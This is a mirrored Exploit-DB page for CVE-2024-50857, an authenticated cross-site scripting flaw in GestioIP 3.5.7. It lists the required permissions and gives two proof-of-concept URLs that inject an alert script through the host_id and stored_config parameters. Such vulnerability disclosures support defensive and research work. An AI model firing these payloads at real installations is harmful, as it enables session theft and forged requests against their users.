bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/52203.txt
Exploit-DB 0f3d104e83 DB: 2025-04-15 
15 changes to exploits/shellcodes/ghdb

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
GestioIP 3.5.7 - Remote Command Execution (RCE)
GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)
OpenPanel 0.3.4 - Directory Traversal
OpenPanel 0.3.4 - Incorrect Access Control
OpenPanel 0.3.4 - OS Command Injection
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal

Pimcore 11.4.2 - Stored cross site scripting

Pimcore customer-data-framework 4.2.0 -  SQL injection

SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)

Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
2025-04-15 00:16:26 +00:00

34 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50857
### Description
The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.
### Prerequisites
To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:
• Show backuped device configurations (read_device_config_perm)
• Upload device configurations (write_device_config_perm)
• Administrate CM (administrative_cm_perm)
1) vulnerable parameter: `host_id`
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'
2) vulnerable parameter: `stored_config`
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'
Reference in a new issue View git blame Copy permalink